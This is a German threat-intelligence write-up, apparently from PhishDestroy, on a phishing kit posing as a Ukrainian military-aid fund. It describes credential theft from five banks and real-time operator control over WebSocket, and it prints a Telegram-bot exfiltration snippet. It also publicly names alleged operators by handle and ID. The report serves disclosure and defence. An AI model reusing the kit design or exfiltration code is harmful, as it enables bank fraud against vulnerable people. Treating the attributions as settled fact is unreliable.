Phishing-Netzwerk im Bereich der Militärhilfe aufgedeckt: 5 Banken ins Visier genommen, Betreiber identifiziert

Was PhishDestroy entdeckt hat

Am 20. März 2026 meldete die automatisierte Pipeline zur Erkennung von Bedrohungen von PhishDestroy dopomogvoina[.]sbs — eine frisch registrierte Domain, auf der eine Phishing-Seite gehostet wird, die sich als „Der Schild des Verteidigers“ („Shield of the Defender“), eine vorgetäuschte Stiftung für militärische Hilfe in der Ukraine. Die Website richtet sich an ukrainische Militärveteranen, Kriegsversehrte und die Familien von gefallenen Soldaten und verspricht staatliche Finanzhilfen, während sie gleichzeitig die Zugangsdaten für fünf der größten Banken der Ukraine stiehlt.

Im Folgenden finden Sie eine vollständige Aufschlüsselung aller Erkenntnisse unserer automatisierten Analyse: das Social Engineering, die technische Infrastruktur, das Echtzeit-Steuerungssystem sowie die Identitäten der Personen, die das System betreiben.

Abschnitt 1: Der Köder – Die vorgetäuschte Militärhilfegesellschaft

Die Domain dopomogvoina[.]sbs wurde am 20. März 2026 über NICENIC International Group Co., Ltd., ein Registrar, der bekanntermaßen nur langsam oder gar nicht auf Missbrauchsfälle reagiert. Der .sbs TLD (Side-By-Side) ist eine kostengünstige gTLD, die häufig für kurzlebige Phishing-Infrastrukturen genutzt wird.

Die Website präsentiert sich als professionelles, regierungsnahes Hilfsportal. Eine ukrainische Flagge ziert die Kopfzeile, militärische Bilder verleihen ihr Authentizität, und der Text ist sorgfältig in ukrainischer Sprache verfasst, wobei die behördliche Ausdrucksweise an seriöse Regierungsprogramme erinnert.

Screenshot 5 – Die Startseite der Phishing-Website, die sich als „Щит Захисника“ (Schild des Verteidigers) ausgibt.

Um Glaubwürdigkeit zu schaffen, fälschten die Betreiber einen Statistikzähler, der gut sichtbar auf der Startseite angezeigt wurde:

• 2.847 Bewerbungen — was bedeutet, dass bereits Tausende Hilfe erhalten haben
• 47,2 Mio. ₴ ausgeschüttet — eine hohe, aber glaubwürdige Zahl in UAH
• 19 Programme — was auf eine umfassende, mehrere Programme umfassende Maßnahme hindeutet

Diese Zahlen sind reine Erfindungen, die fest in den Quellcode der Seite eingebettet sind und keinerlei Verbindung zum Backend haben. Sie dienen einem einzigen Zweck: als sozialer Beweis, um die Zurückhaltung des Opfers zu überwinden.

Abschnitt 2: Die Falle – 5 Banken, ein Ziel

Nach dem Klicken auf „Подати заявку“ (Antrag einreichen) wird dem Opfer ein Bildschirm zur Auswahl einer Bank angezeigt. Als Optionen werden fünf der größten Privatkundenbanken der Ukraine angezeigt, jeweils mit ihrem offiziellen Markenauftritt und Logo. An dieser Stelle wechselt das Social Engineering von emotionaler Manipulation zu technischem Diebstahl.

Screenshot 6 – Bildschirm zur Bankauswahl. Jede Option führt zu einer individuellen Abfolge von Anmelde- und Passwortdiebstählen.

Die Analyse des JavaScript-Bundles der Website ergab, dass jede Bank ein einzigartige mehrstufige Abfolge zum Ausspähen von Zugangsdaten, das genau auf den tatsächlichen Authentifizierungsablauf dieser Bank zugeschnitten ist:

Der Ablauf des Angriffs ist bei jeder Bank derselbe:

Screenshot 7 – Nachgebildete Anmeldeseite der PrivatBank.

Screenshot 9 – Geklonte PUMB-Anmeldung.

Screenshot 10 – Der gesamte Angriffsablauf: von der gefälschten Seite für Militärhilfe über die Bankauswahl bis hin zum Diebstahl von Zugangsdaten und der Übernahme des Kontos.

Der Tech-Stack: React-SPA Frontend bereitgestellt über Cloudflare CDN, mit einem Express.js Backend zur Exfiltration von Anmeldedaten. Die React-Architektur ermöglicht nahtlose, mehrstufige Formulare, die sich kaum von echten Bankoberflächen unterscheiden lassen.

Abschnitt 3: Echtzeit-Bedienersteuerung

Es handelt sich hierbei nicht um einen einfachen Credential-Harvester mit einer statischen Datenbank. Das Phishing-Kit umfasst einen Live-WebSocket-Kontrollfeld die es einem menschlichen Bediener ermöglicht, jede Opfersitzung in Echtzeit zu steuern.

Der WebSocket-Endpunkt unter wss://dopomogvoina[.]sbs/ws unterstützt die folgenden Nachrichtentypen:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Dank dieser Echtzeitsteuerung kann der Bediener:

• Einen Wartezustand erzwingen — die Meldung „Ihre Anfrage wird bearbeitet...“ anzeigen, während sie sich in das echte Bankkonto des Opfers einloggen
• Zu einem bestimmten Schritt weiterleiten — einen neuen SMS-Code anfordern, falls der erste abgelaufen ist
• Falsche Fehlermeldungen anzeigen — „Ungültiger Code, bitte erneut eingeben“, um mehrere 2FA-Token zu sammeln
• Individuelle Fragen stellen — während der Sitzung nach dem Geburtsdatum, der Kartennummer oder weiteren Daten fragen

Screenshot 8 – Formular zur Eingabe der Telefonnummer, das zum Diebstahl von Zugangsdaten genutzt wird.

Screenshot 11 – Das Echtzeit-Bot-Panel des Betreibers zur Steuerung der Opfer-Sitzungen.

Der gesamte Umfang der pro Sitzung gestohlenen Daten: phone, password, PIN, SMS code, card number, date of birthund email.

Abschnitt 4: Hinter den Kulissen von Cloudflare – Zwei Projekte, ein Server

Das Cloudflare-Proxying verbirgt den Ursprungsserver, doch die Infrastruktur-Analysepipeline von PhishDestroy hat die tatsächliche Ursprungs-IP ermittelt: 45.131.214[.]148, gehostet bei RapidSeedbox / LeaseWeb in den Niederlanden.

Ein entscheidendes Detail: dopomogvoina[.]sbs wird über Cloudflare, wobei die IP-Adresse des Absenders verborgen bleibt. Unser System verfolgt jedoch auch hlpforvpeople[.]sbs — eine verwandte Domain, die über denselben NICENIC-Registrar registriert wurde und übereinstimmende Muster aufweist. Diese Domain lautet NICHT hinter Cloudflare, wodurch die IP-Adresse des Absenders direkt offengelegt wird: 45.131.214[.]148.

Eine direkte Verbindung zu dieser IP-Adresse herstellen – ohne einen Host Kopfzeile – enthüllte etwas Unerwartetes: ein eine völlig andere Phishing-Seite. Anstelle der militärischen Hilfe für die Ukraine wurde der Standard-Vhost bereitgestellt „Gesundheitsausweis“, eine Phishing-Aktion, die sich gegen eine indonesische Krankenkasse richtete. Derselbe Server, völlig andere Opfer, ein völlig anderes Land.

Screenshot 12 – Zwei parallele Phishing-Aktionen, die denselben Ursprungsserver nutzen: Militärhilfe für die Ukraine (dopomogvoina) und indonesische Krankenversicherung (HealthCare ID).

Die indonesische Phishing-Vorlage ist eine bekanntes Kit, das in der Bedrohungsdatenbank von PhishDestroy erfasst ist. Wir haben festgestellt, dass Varianten genau dieser Vorlage in ganz Südostasien eingesetzt werden – gezielt gegen indonesische, thailändische und vietnamesische Finanzinstitute. Die Betreiber tauschen lediglich die länderspezifischen Vorlagen aus, während sie dieselbe Backend-Infrastruktur weiterverwenden.

Abschnitt 5: Die config.json, die alles offenlegte

So hat eine einzige falsch konfigurierte Datei den gesamten Betrieb lahmgelegt – Schritt für Schritt.

Nachdem das zweite Projekt des Ursprungsservers identifiziert worden war, hat PhishDestroy JS Analyzer — unser automatisiertes Tool zur Analyse von JavaScript — wurde auf das Paket der indonesischen Phishing-Website unter https://45.131.214[.]148/assets/index-ZMQxHb_h.js. Der Analysator extrahierte alle API-Endpunkte, externen URLs und Konfigurationspfade aus der 335 KB großen JavaScript-Datei. Zu den Ergebnissen gehören:

• Fünf API-Endpunkte unter rezervtemka[.]cc — das C2-Panel zur Überprüfung von Zugangsdaten
• Eine WebSocket-Verbindung zu wss://rezervtemka[.]cc
• Integration des Facebook-Pixels zur Nachverfolgung von Opfern
• Ein Verweis auf /config.json — wird zur Laufzeit für die Konfiguration des Telegram-Bots geladen

Diesem Hinweis folgend haben wir /config.json von der Ursprungs-IP. Die Datei war ohne jegliche Authentifizierung zugänglich – sie befand sich im Webroot und war für jeden lesbar:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

Die /config.json Die Datei war direkt von der Ursprungs-IP aus zugänglich — Keine Authentifizierung, keine Zugriffskontrolle, nur eine einfache JSON-Datei im Web-Stammverzeichnis:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Ein Telegram-Bot-Token dient sowohl als Benutzername als auch als Passwort. Wer über das Token verfügt, kann API-Aufrufe als dieser Bot ausführen. Die Betreiber haben ihr Token in einer öffentlich zugänglichen Datei hinterlegt. Sechs API-Aufrufe später hatten wir alles:

Screenshot 13 – Die gesamte OSINT-Kette: von der offengelegten config.json bis zur vollständigen Identifizierung des Betreibers in 6 API-Aufrufen.

Von einer einzigen falsch konfigurierten Datei bis hin zur vollständigen Identifizierung der Betreiber in sechs HTTP-Anfragen. Keine Exploits, kein unbefugter Zugriff – lediglich Standard-Aufrufe der Telegram-Bot-API unter Verwendung eines Tokens, das die Betreiber selbst offen zugänglich gelassen hatten.

Abschnitt 6: Die Betreiber

Screenshot 14 – Die Telegram-Operatorgruppe „Idr card“, die durch das durchgesickerte Bot-Token aufgedeckt wurde.

Inhaber / Gründer

MONETTI ESCOBAR

@monettiescobar

Telegram-ID: 8135223234

Telegram Premium, Unternehmensprofil

Zeitzone: UTC+3 (GUS-Region)

10 öffentliche Nachrichten – strenge OPSEC

TraFFeeQ-ChatMedusa Google AdsDeepfakes-Kanal

Dispositionskraft / Verkehrsleitung

Mach mal langsam

Guten Morgen

Telegram-ID: 6242202706

Auch bekannt als: PapaZakonVor, Boa, bubullikk

261 Beiträge in 12 Gruppen

DC2 – Amsterdam, NL

CryptoGrabSTYX-MarktStufe CCEMPIRE CHATPhoenix-Lösung

Entwickler / Programmierer

Devoys

@devosus

Telegram-ID: 8213612730

Entwickler von Phishing-Kits – Betreiber bezeichnen ihn als Programmierer

Aufgefordert, „über die Verteidigung nachzudenken“, wenn eine Sicherheitslücke entdeckt wird

Von vornherein auf einen minimalen Platzbedarf ausgelegt

Einkaufen @devosus ≈ „dev ops us“ – Berufsbezeichnung als Benutzername

Entwickler von BausätzenInfrastrukturSicherheit

MONETTI ESCOBAR – Der Boss

MONETTI achtet streng auf die Sicherheit im Betrieb – nur 10 öffentliche Nachrichten auf zwei Gruppen verteilt. Aber die Gruppen sprechen für sich: TraFFeeQ-Chat (Traffic-Arbitrage zu betrügerischen Zwecken), Medusa Google Ads (Black-Hat-Google-Ads) sowie ein Deepfakes-Kanal. In seinem Telegram-Unternehmensprofil steht „Есть предложение“ („Ich habe einen Vorschlag“) – offene Werbung für Dienstleistungen. Die Zeitzone UTC+3 (entspricht Moskau/Minsk/Kiew) und die Geschäftszeiten rund um die Uhr bestätigen, dass es sich um einen rund um die Uhr aktiven Betrieb mit Sitz in der GUS handelt.

Bonya – Der Unachtsame

Im Gegensatz zu MONETTIs sorgfältiger OPSEC ist Bonya (früheres Pseudonym: Vater des Gesetzes — sinngemäß „DaddyThiefByLaw“) hinterließ eine riesige digitale Spur — 261 Nachrichten in 12 Untergrundgruppen. Sein Chatverlauf liest sich wie ein krimineller Lebenslauf:

Seine Mitgliedschaften in verschiedenen Gruppen vermitteln ein umfassendes Bild: CryptoGrab (Krypto-Wallet-Leerzieher), STYX-Markt (Untergrundmarktplatz für gestohlene Daten), CC-Prüfprogramm (Tools zur Kreditkartenüberprüfung), EMPIRE CHAT und Phoenix-Lösung (Koordination von Betrugsdelikten). Es handelt sich hier nicht um einen Einmaltäter – sondern um jemanden, der fest im Ökosystem der Cyberkriminalität verankert ist.

Devoys – Der Entwickler

Das technische Rückgrat der Operation. Von vornherein auf minimale öffentliche Präsenz ausgelegt – als die Gruppe angegriffen wurde, wandte sich Bonya ausdrücklich an ihn: „@devosus, denk mal über die Verteidigung nach, bevor uns jemand den Arsch aufreißt“ — „@devosus, denk mal an die Verteidigung, bevor wir ordentlich eins auf die Mütze bekommen.“ Seine sarkastische Reaktion auf den Vorfall — „wenn bei Interpol“ („Wann sollte man interpolieren?“) – lässt vermuten, dass dies nicht ihr erster Beinaheunfall ist.

Verhaltensanalyse: 261 Nachrichten entschlüsselt

Die OSINT-Pipeline von PhishDestroy hat Daten gesammelt und übersetzt alle 261 öffentlichen Nachrichten von Bonya aus über 12 unterirdische Telegram-Gruppen (Juni 2024 – März 2026). Maschinelle Übersetzung über die DeepL-API mit manueller Korrektur im Kontext. Die Nachrichten geben Aufschluss über ein vollständiges operatives Profil – nach Art der kriminellen Aktivitäten unten kategorisiert.

Bankbetrug und Phishing

Geldkurier & Geldabhebung

Traffic-Betrug und Missbrauch von Anzeigen

MONETTI ESCOBAR: Der stille Chef

Im krassen Gegensatz zu Bonyas 261 Beiträgen hat MONETTI nur 10 öffentliche Nachrichten — alles in einem einzigen Thread auf TraFFeeQ-Chat (Arbitrage mit schwarzem ADS-/SEO-Traffic), zur Verteidigung eines Kollegen:

Die Telegram-Gruppen von MONETTI verraten den Rest: Medusa Google Ads (Black-Hat-PPC-Betrug), ein Deepfakes-Kanal (synthetische Datenträger für Betrugszwecke) sowie Marlboro-Chat (privat, unbekannt). Das Telegram-Premium-Abonnement, Geschäftszeiten rund um die Uhr und „Есть предложение“ („Ich habe einen Vorschlag“) Die Unternehmensbiografie zeichnet das Bild einer Person, die Cyberkriminalität als Vollzeitbeschäftigung betreibt.

Screenshot 2 – MONETTIs Telegram-Profil.

Screenshot 3 – Bonyas Profil. Beachte DC2 (Amsterdam).

Kapitel 7: Der Panikraum

Nachdem PhishDestroy über den öffentlich zugänglichen Telegram-Bot auf die Betreibergruppe zugegriffen hatte, kam es zu folgendem Austausch. Das nachstehende Chatprotokoll wurde ins Englische übersetzt, wobei der russische Originaltext kursiv beibehalten wurde. Die für den Zugriff verwendete Identität wurde unkenntlich gemacht.

Die Gruppe wurde innerhalb weniger Minuten gelöscht. Bonyas Abschiedsgruß – „+“ – und Devoys Bestätigung „ja“ sagen alles: Sie wussten, dass sie entlarvt waren, und ihre einzige Möglichkeit bestand darin, die Beweise zu vernichten. Doch zu diesem Zeitpunkt waren die Daten bereits erfasst worden.

Beachte Bonyas aufschlussreiche Bemerkung: „Wir wurden auch über den ukrainischen Bot angegriffen“ — was bestätigt, dass beide Projekte (das ukrainische und das indonesische) dasselbe Betreiberteam haben und dass dies nicht das erste Mal war, dass ihre Infrastruktur kompromittiert wurde.

Abschnitt 8: Was dies zeigt

Zeitplan der Ermittlungen

Verwandte Domains

Unsere Analyse hat einen zweiten Bereich identifiziert — hlpforvpeople[.]sbs — die über denselben Registrar registriert wurden und übereinstimmende Infrastrukturmerkmale aufweisen. Beide Domains sind in unserer Datenbank erfasst:

• PhishDestroy-Bericht: dopomogvoina[.]sbs
• PhishDestroy-Bericht: hlpforvpeople[.]sbs

Das Wichtigste in Kürze

• Nur durch Automatisierung kann man Schritt halten. Phishing-Kits werden innerhalb weniger Stunden bereitgestellt und einsatzbereit gemacht. Eine manuelle Überprüfung kann da nicht mithalten.
• Bediener machen Fehler. Eine ungeschützte Konfigurationsdatei in einem Nebenprojekt deckte eine ganze multinationale Phishing-Operation auf. Es ist schwierig, in jedem Projekt eine lückenlose OPSEC aufrechtzuerhalten.
• Social Engineering entwickelt sich mit dem Nachrichtenzyklus weiter. Krieg, humanitäre Hilfe und staatliche Programme werden zunehmend als Vorwand für Phishing-Angriffe missbraucht, da sie Menschen in Not ansprechen, die die Legitimität solcher Angebote weniger hinterfragen.
• Die Wiederverwendung von Infrastruktur ist die Regel. Ein Server, zwei Phishing-Projekte, zwei Länder, dieselben Betreiber. Die Verfolgung von Infrastrukturverbindungen liefert weitaus mehr Erkenntnisse als die isolierte Analyse einer einzelnen Domain.

Haftungsausschluss: Diese Untersuchung wurde ausschließlich mittels passiver Aufklärung und öffentlicher APIs durchgeführt. Es erfolgte kein unbefugter Zugriff auf irgendein System. Bei den Aufrufen der Telegram-Bot-API wurde ein Token verwendet, das von den Betreibern in einem nicht authentifizierten Endpunkt öffentlich zugänglich gemacht worden war. Alle Domainnamen in diesem Artikel wurden gemäß den üblichen InfoSec-Konventionen unkenntlich gemacht.